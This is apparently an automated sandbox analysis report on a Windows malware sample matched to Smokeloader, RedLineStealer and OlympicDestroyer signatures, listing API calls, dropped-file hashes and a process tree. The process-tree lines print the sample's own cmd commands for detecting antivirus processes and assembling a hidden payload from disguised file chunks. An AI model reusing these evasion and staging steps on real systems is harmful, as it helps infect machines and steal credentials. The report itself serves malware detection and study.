Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401565
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401579
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040157C

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C540C1: CreateFileW,DeviceIoControl,CloseHandle,

19_2_00C540C1

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C48D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_00C48D11

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		7_2_00403883
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C555E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		19_2_00C555E5

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_0040497C	7_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_00406ED2	7_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: 7_2_004074BB	7_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C781C8	19_2_00C781C8
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C12325	19_2_00C12325
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C26432	19_2_00C26432
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C2258E	19_2_00C2258E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BFE6F0	19_2_00BFE6F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1275A	19_2_00C1275A
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C288EF	19_2_00C288EF
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C70802	19_2_00C70802
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C269A4	19_2_00C269A4
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C00BE0	19_2_00C00BE0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C4EB95	19_2_00C4EB95
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1CC81	19_2_00C1CC81
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C58CB1	19_2_00C58CB1
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C70C7F	19_2_00C70C7F
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C26F16	19_2_00C26F16
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BFB020	19_2_00BFB020
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C132E9	19_2_00C132E9
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1F339	19_2_00C1F339
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF94E0	19_2_00BF94E0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C0D457	19_2_00C0D457
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C115E4	19_2_00C115E4
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C0F57E	19_2_00C0F57E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BFF6A0	19_2_00BFF6A0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF1663	19_2_00BF1663
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C177F3	19_2_00C177F3
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1DAD5	19_2_00C1DAD5
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C11AD8	19_2_00C11AD8
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00BF9C80	19_2_00BF9C80
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C29C15	19_2_00C29C15
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C0DD14	19_2_00C0DD14
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C11EF0	19_2_00C11EF0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C1BF06	19_2_00C1BF06
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014481D0	19_2_014481D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01420BD0	19_2_01420BD0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0149CD00	19_2_0149CD00
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0148CD30	19_2_0148CD30
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01420CE8	19_2_01420CE8
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0140D180	19_2_0140D180
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014175D0	19_2_014175D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01447430	19_2_01447430
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0144D7E0	19_2_0144D7E0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01447C60	19_2_01447C60
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014F0179	19_2_014F0179
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01440110	19_2_01440110
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014AE190	19_2_014AE190
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014B8000	19_2_014B8000
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01438030	19_2_01438030
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01434080	19_2_01434080
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01456310	19_2_01456310
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014343D0	19_2_014343D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014323E0	19_2_014323E0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014383B0	19_2_014383B0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014E42C1	19_2_014E42C1
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014A8560	19_2_014A8560
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014525C0	19_2_014525C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014A45C0	19_2_014A45C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0146A590	19_2_0146A590
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014804D0	19_2_014804D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014DA4F0	19_2_014DA4F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01462743	19_2_01462743
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0145C700	19_2_0145C700
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014547C0	19_2_014547C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014666F0	19_2_014666F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01488920	19_2_01488920
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0145A9F0	19_2_0145A9F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014F485F	19_2_014F485F
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01444870	19_2_01444870
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0144A8C0	19_2_0144A8C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0147A8B0	19_2_0147A8B0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0143EB20	19_2_0143EB20
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0147CA10	19_2_0147CA10
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01444D70	19_2_01444D70
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01458C70	19_2_01458C70
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01432C00	19_2_01432C00
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0144ECA0	19_2_0144ECA0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01440F50	19_2_01440F50
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01482FF0	19_2_01482FF0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014E0F90	19_2_014E0F90
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014871F0	19_2_014871F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01439180	19_2_01439180
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0144F070	19_2_0144F070
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014530C0	19_2_014530C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014570C0	19_2_014570C0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01433340	19_2_01433340
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014A7270	19_2_014A7270
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014DB20E	19_2_014DB20E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014AF2F0	19_2_014AF2F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01469540	19_2_01469540
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014F7595	19_2_014F7595
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0144F5A0	19_2_0144F5A0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014EF44E	19_2_014EF44E
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_01451430	19_2_01451430
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0143D730	19_2_0143D730
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014377D0	19_2_014377D0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014317A0	19_2_014317A0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0142F6F0	19_2_0142F6F0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_0146B6A0	19_2_0146B6A0
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_014336B0	19_2_014336B0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\78801\Later.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\9CFE.exe AC46787D7511520D8DD14CB5A094141F338CC50B3C7B8CB31E3F136F5AD871BA
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Armenia A18537B767336C9FD3265E9919034505CA376D43BD291629E0B245D66B71A2F9

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 00C01A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 0143D020 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 0143DD90 appears 131 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 01423A20 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 00C18A60 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 0143D480 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 01423B20 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 014D942B appears 31 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 01424B80 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 014D97B0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: String function: 00C10C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Code function: String function: 004062A3 appears 58 times

Source: file.exe, 00000000.00000002.2182537935.0000000002095000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdlasig0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdlasig0 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 19.2.Later.pif.1400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 19.2.Later.pif.1400000.1.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wjshsfa.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@27/58@10/6

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C5A51A GetLastError,FormatMessageW,

19_2_00C5A51A

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C48BCC AdjustTokenPrivileges,CloseHandle,		19_2_00C48BCC
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	Code function: 19_2_00C4917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		19_2_00C4917C

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

7_2_004044A5

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_022A209C CreateToolhelp32Snapshot,Module32First,

0_2_022A209C

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_004024FB CoCreateInstance,

7_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C542AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_00C542AA

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wjshsfa

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\9CFE.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Later.pif, 00000013.00000003.4107780307.0000000003961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: file.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wjshsfa C:\Users\user\AppData\Roaming\wjshsfa
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9CFE.exe C:\Users\user\AppData\Local\Temp\9CFE.exe
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\B
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pif
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9CFE.exe C:\Users\user\AppData\Local\Temp\9CFE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9CFE.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B	Jump to behavior
